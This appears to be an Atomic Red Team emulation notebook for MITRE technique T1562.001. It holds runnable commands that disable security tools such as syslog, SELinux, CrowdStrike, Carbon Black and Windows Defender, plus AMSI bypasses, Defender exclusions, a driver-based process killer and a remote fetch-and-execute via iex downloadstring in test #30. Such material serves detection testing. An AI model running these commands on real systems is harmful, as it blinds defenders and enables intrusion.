# T1562.001 - Disable or Modify Tools
Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)

Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)

In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.

Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)

Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)

## Atomic Tests

### Atomic Test #1 - Disable syslog
Disables syslog collection

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Package with rsyslog must be on system

##### Check Prereq Commands:
```sh
if (rpm -q rsyslog 2>&1 >/dev/null) || (dpkg -s rsyslog | grep -q installed) > /dev/null; then exit 0; else exit 1; fi

```
##### Get Prereq Commands:
```sh
sudo (which yum && yum -y install epel-release rsyslog)||(which apt-get && apt-get install -y rsyslog) 

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
systemctl stop rsyslog ; systemctl disable rsyslog
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 1

#### Cleanup: 
```sh
systemctl start rsyslog ; systemctl enable rsyslog
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Disable Cb ResponseDisable the Cb Response service
**Supported Platforms:** linux#### Attack Commands: Run with `sh`
```sh
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
  service cbdaemon stop
  chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
  systemctl stop cbdaemon
  systemctl disable cbdaemon
fi
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 2

### Atomic Test #3 - Disable SELinuxDisables SELinux enforcement
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
setenforce 0
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 3

#### Cleanup: 
```sh
setenforce 1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Stop Crowdstrike Falcon on LinuxStop and disable Crowdstrike Falcon on Linux
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo systemctl stop falcon-sensor.service
sudo systemctl disable falcon-sensor.service
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 4

#### Cleanup: 
```sh
sudo systemctl enable falcon-sensor.service
sudo systemctl start falcon-sensor.service
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Disable Carbon Black ResponseDisables Carbon Black Response
**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 5

#### Cleanup: 
```sh
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 5 -Cleanup

### Atomic Test #6 - Disable LittleSnitchDisables LittleSnitch
**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 6

#### Cleanup: 
```sh
sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 6 -Cleanup

### Atomic Test #7 - Disable OpenDNS UmbrellaDisables OpenDNS Umbrella
**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 7

#### Cleanup: 
```sh
sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 7 -Cleanup

### Atomic Test #8 - Disable macOS GatekeeperDisables macOS Gatekeeper
**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo spctl --master-disable
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 8

#### Cleanup: 
```sh
sudo spctl --master-enable
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 8 -Cleanup

### Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOSStop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
**Supported Platforms:** macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo launchctl unload /Library/LaunchDaemons/com.crowdstrike.falcond.plist
sudo launchctl unload /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 9

#### Cleanup: 
```sh
sudo launchctl load -w /Library/LaunchDaemons/com.crowdstrike.falcond.plist
sudo launchctl load -w /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 9 -Cleanup

### Atomic Test #10 - Unload Sysmon Filter Driver
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,
run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Sysmon must be downloaded

##### Check Prereq Commands:
```cmd
if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }

```
##### Get Prereq Commands:
```cmd
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
Remove-Item $env:TEMP\Sysmon.zip -Force

```
##### Description: sysmon must be Installed

##### Check Prereq Commands:
```cmd
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }

```
##### Get Prereq Commands:
```cmd
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}

```
##### Description: sysmon filter must be loaded

##### Check Prereq Commands:
```cmd
if(fltmc.exe filters | findstr SysmonDrv) { exit 0 } else { exit 1 }

```
##### Get Prereq Commands:
```cmd
sysmon -u
sysmon -accepteula -i

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 10 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
fltmc.exe unload SysmonDrv
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 10

#### Cleanup: 
```cmd
sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
%temp%\Sysmon\sysmon.exe -u > nul 2>&1
%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 10 -Cleanup

### Atomic Test #11 - Uninstall Sysmon
Uninstall Sysinternals Sysmon for Defense Evasion

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Sysmon executable must be available

##### Check Prereq Commands:
```cmd
if(cmd /c where sysmon) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
$parentpath = Split-Path "PathToAtomicsFolder\T1562.001\bin\sysmon.exe"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}

```
##### Description: Sysmon must be installed

##### Check Prereq Commands:
```cmd
if(cmd /c sc query sysmon) { exit 0} else { exit 1}

```
##### Get Prereq Commands:
```cmd
cmd /c sysmon -i -accepteula

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 11 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
sysmon -u
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 11

#### Cleanup: 
```cmd
sysmon -i -accepteula >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 11 -Cleanup

### Atomic Test #12 - AMSI Bypass - AMSI InitFailedAny easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
Upon execution, no output is displayed.

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 12

#### Cleanup: 
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 12 -Cleanup

### Atomic Test #13 - AMSI Bypass - Remove AMSI Provider Reg KeyWith administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 13

#### Cleanup: 
```powershell
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 13 -Cleanup

### Atomic Test #14 - Disable Arbitrary Security Windows ServiceWith administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.
To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
net.exe stop McAfeeDLPAgentService
sc.exe config McAfeeDLPAgentService start= disabled
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 14

#### Cleanup: 
```cmd
sc.exe config McAfeeDLPAgentService start= auto >nul 2>&1
net.exe start McAfeeDLPAgentService >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 14 -Cleanup

### Atomic Test #15 - Tamper with Windows Defender ATP PowerShellAttempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 15

#### Cleanup: 
```powershell
Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 15 -Cleanup

### Atomic Test #16 - Tamper with Windows Defender Command PromptAttempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
will be displayed twice and the WinDefend service status will be displayed.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 16

#### Cleanup: 
```cmd
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 16 -Cleanup

### Atomic Test #17 - Tamper with Windows Defender RegistryDisable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
grayed out and have no info.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 17

#### Cleanup: 
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 17 -Cleanup

### Atomic Test #18 - Disable Microsoft Office Security FeaturesGorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
show any warning before editing the document.


https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 18

#### Cleanup: 
```powershell
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 18 -Cleanup

### Atomic Test #19 - Remove Windows Defender Definition FilesRemoving definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
command will say completed.

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 19

### Atomic Test #20 - Stop and Remove Arbitrary Security Windows ServiceBeginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Stop-Service -Name McAfeeDLPAgentService
Remove-Service -Name McAfeeDLPAgentService
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 20

### Atomic Test #21 - Uninstall Crowdstrike Falcon on WindowsUninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
if (Test-Path "C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe") {. "C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 21

### Atomic Test #22 - Tamper with Windows Defender Evade Scanning -FolderMalware can exclude a specific path from being scanned and evading detection. 
Upon successul execution, the file provided should be on the list of excluded path. 
To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath 
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$excludedpath= "C:\Temp"
Add-MpPreference -ExclusionPath $excludedpath```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 22

#### Cleanup: 
```powershell
$excludedpath= "C:\Temp"
Remove-MpPreference -ExclusionPath $excludedpath
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 22 -Cleanup

### Atomic Test #23 - Tamper with Windows Defender Evade Scanning -ExtensionMalware can exclude specific extensions from being scanned and evading detection. 
Upon successful execution, the extension(s) should be on the list of excluded extensions.
To check the exclusion list using poweshell  (Get-MpPreference).ExclusionExtension.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$excludedExts= ".exe"
Add-MpPreference -ExclusionExtension  $excludedExts```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 23

#### Cleanup: 
```powershell
$excludedExts= ".exe"
Remove-MpPreference -ExclusionExtension  $excludedExts -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 23 -Cleanup

### Atomic Test #24 - Tamper with Windows Defender Evade Scanning -ProcessMalware can exclude specific processes from being scanned and evading detection.
Upon successful execution, the process(es) should be on the list of excluded processes. 
To check the exclusion list using poweshell  (Get-MpPreference).ExclusionProcess."
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$excludedProcess = "outlook.exe"
Add-MpPreference -ExclusionProcess $excludedProcess```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 24

#### Cleanup: 
```powershell
$excludedProcess = "outlook.exe"
Remove-MpPreference -ExclusionProcess  $excludedProcess
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 24 -Cleanup

### Atomic Test #25 - office-365-Disable-AntiPhishRule
Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.

**Supported Platforms:** office-365

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: ExchangeOnlineManagement PowerShell module must be installed

##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 25 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$secure_pwd = "None" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "None", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 25

#### Cleanup: 
```powershell
if("None" -ne "") {
$secure_pwd = ("None" + "") | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "None", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
} 
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 25 -Cleanup

### Atomic Test #26 - Disable Windows Defender with DISMThe following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool. 
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed.
This method will remove Defender and it's package.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 26

### Atomic Test #27 - Disable Defender with Defender Control
Attempting to use Defender Control software to disable Windows Defender. Upon successful execution, Windows Defender will be turned off. 

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Defender Control must be installed on the machine. 

##### Check Prereq Commands:
```powershell
if (Test-Path $env:temp\DefenderControl\DefenderControl\DefenderControl.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Start-BitsTransfer -Source "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -Destination "$env:temp\defendercontrol.zip" -dynamic
expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$env:temp\DefenderControl"

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 27 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
cmd /c $env:temp\DefenderControl\DefenderControl\DefenderControl.exe /D FFFF | Out-Null
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 27

#### Cleanup: 
```powershell
cmd /c $env:temp\DefenderControl\DefenderControl\DefenderControl.exe /E | Out-Null
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 27 -Cleanup

### Atomic Test #28 - Disable Defender Using NirSoft AdvancedRun
Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html
This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3
Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk. 

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Advancedrun.exe must exist at #{AdvancedRun_Location}

##### Check Prereq Commands:
```powershell
if(Test-Path -Path $env:temp\AdvancedRun.exe) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip"
Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 28 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Try {cmd /c $env:temp\AdvancedRun.exe /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
if(0){
  $CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
  Try {cmd /c $env:temp\AdvancedRun.exe /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
}
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 28

#### Cleanup: 
```powershell
Try {cmd /c $env:temp\AdvancedRun.exe /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 28 -Cleanup

### Atomic Test #29 - Kill antimalware protected processes using Backstab
Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill.
https://github.com/Yaxser/Backstab
**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Backstab64.exe should exist in %temp%
##### Check Prereq Commands:
```powershell
if (Test-Path $env:temp\Backstab64.exe) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Start-BitsTransfer -Source "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -Destination "$env:temp\Backstab64.exe" -dynamic
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 29 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
& $env:temp\Backstab64.exe -k -n MsMpEng.exe```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 29

### Atomic Test #30 - WinPwn - Kill the event log services for stealthKill the event log services for stealth via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
inv-phantom -consoleoutput -noninteractive  ```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 30

### Atomic Test #31 - Tamper with Windows Defender ATP using Aliases - PowerShellAttempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Set-MpPreference -drtm $True
Set-MpPreference -dbm $True
Set-MpPreference -dscrptsc $True
Set-MpPreference -dbaf $True
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 31

#### Cleanup: 
```powershell
Set-MpPreference -drtm 0
Set-MpPreference -dbm 0
Set-MpPreference -dscrptsc 0
Set-MpPreference -dbaf 0
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 31 -Cleanup

### Atomic Test #32 - LockBit Black - Disable Privacy Settings Experience Using Registry -cmdLockBit Black - Disable Privacy Settings Experience Using Registry
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 32

#### Cleanup: 
```cmd
reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 32 -Cleanup

### Atomic Test #33 - LockBit Black - Use Registry Editor to turn on automatic logon -cmdLockBit Black - Use Registry Editor to turn on automatic logon
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Administrator /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /t REG_SZ /d contoso.com /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d password1 /f
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 33

#### Cleanup: 
```cmd
